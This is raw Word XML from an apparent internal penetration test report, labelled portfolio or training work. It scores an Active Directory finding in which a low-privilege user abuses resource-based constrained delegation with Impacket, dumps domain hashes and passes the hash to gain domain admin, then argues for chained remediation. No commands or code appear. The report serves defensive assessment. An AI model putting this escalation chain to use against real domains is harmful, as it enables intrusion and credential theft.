            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8823" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D882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25" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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26" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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27" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RBCD abuse performed entirely via network-based Kerberos/LDAP operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D882C"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29" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity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2A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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2B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Well-documented, scripted, repeatable chain using standard </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impacket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> tooling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D8830"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2D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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2E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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2F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Requires only a standard domain user in SHARED SUPPORT ACCOUNTS — not administrative.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D883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31" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction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2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None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3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fully scriptable end-to-end with no victim action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D883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35" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope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6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Changed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7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploiting the ACE on DC$ cascades into control of the entire AD forest — a different security authority than the vulnerable object itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D883C"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39" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality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A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full domain hash dump capability (NTLM hashes for any/all accounts).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D8840"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3D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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3F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pass-the-Hash as Administrator grants arbitrary write/modify access domain-wide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D884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AEDF1"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8841" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability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42" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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D8843" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain Administrator access permits disabling accounts, modifying GPOs, or disrupting services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D8845" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Note: CVSS Base Scores are intentionally scored per-finding in isolation, per FIRST.org scoring guidance. The realistic business risk of this engagement is best understood as the chain itself: an attacker starting with zero credentials and zero privileges reaches Domain Administrator through four sequential, individually-patchable weaknesses. Organizations should not deprioritize Finding 1 because of its Medium standalone score — its role as the entry point into a Critical-impact chain should elevate its re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mediation priority. This is why </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-in-depth across every link in the chain, not just the highest-CVSS item, is the correct remediation strategy.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00635C3F">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8280" w14:textId="77777777" w:rsidR="00E22FF4" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="534EC385" w14:textId="77777777" w:rsidR="00E22FF4" w:rsidRDefault="00E22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8847" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3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8849" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C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884B" w14:textId="435297EC" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">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81451F">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10EA2" w14:textId="77777777" w:rsidR="00E22FF4" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70B4EEC9" w14:textId="77777777" w:rsidR="00E22FF4" w:rsidRDefault="00E22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8846" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3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8848" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3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884A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="4" w:color="9FEF00"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="555555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Support Solutions Inc. — Internal Penetration Test</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="555555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t>CONFIDENTIAL — PORTFOLIO / TRAINING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17D29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F4A6152"/>
    <w:lvl w:ilvl="0" w:tplc="E12E47C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="37BC97EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FEEECA0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="777067AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="59D0D582">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="968E67C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1A127690">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F7343948">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C8F0529A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EF02D57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B02D19E"/>
    <w:lvl w:ilvl="0" w:tplc="4098874E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="472E2994">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="85743CFA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BCDA6636">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9956F932">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AFD050B8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="21E6D64C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9DA8D5F4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AF9EE5B4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6FB66634"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F37C7E36"/>
    <w:lvl w:ilvl="0" w:tplc="5BEE0DF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D0A04A0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0D5A81A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6E10C220">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F3E2B4C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F5B243B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5C4C4FC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D8E201F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A5DEC184">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1381900445">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1633248008">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1845124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3F"/>
    <w:rsid w:val="0004013D"/>
    <w:rsid w:val="00073D4B"/>
    <w:rsid w:val="00152D91"/>
    <w:rsid w:val="00295BD1"/>
    <w:rsid w:val="003379C9"/>
    <w:rsid w:val="003518CC"/>
    <w:rsid w:val="006000BB"/>
    <w:rsid w:val="006135DB"/>
    <w:rsid w:val="00635C3F"/>
    <w:rsid w:val="006B73BF"/>
    <w:rsid w:val="00811E11"/>
    <w:rsid w:val="0081451F"/>
    <w:rsid w:val="00815922"/>
    <w:rsid w:val="00874D64"/>
    <w:rsid w:val="00907577"/>
    <w:rsid w:val="00922E3A"/>
    <w:rsid w:val="00AA2E68"/>
    <w:rsid w:val="00AB5E87"/>
    <w:rsid w:val="00C70BC6"/>
    <w:rsid w:val="00CD2A4E"/>
    <w:rsid w:val="00CD532E"/>
    <w:rsid w:val="00D31A66"/>
    <w:rsid w:val="00E22FF4"/>
    <w:rsid w:val="00ED4DBF"/>
    <w:rsid w:val="00F10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8656"/>
  <w15:docId w15:val="{E13A1484-F205-4404-9A25-BB2800D7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9FEF00"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0B1622"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A2B3C"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="33475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451F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0081451F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008145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3918</Words>
  <Characters>22334</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>186</Lines>
  <Paragraphs>52</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Rajdeep Sarkar</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-24T09:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-24T09:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>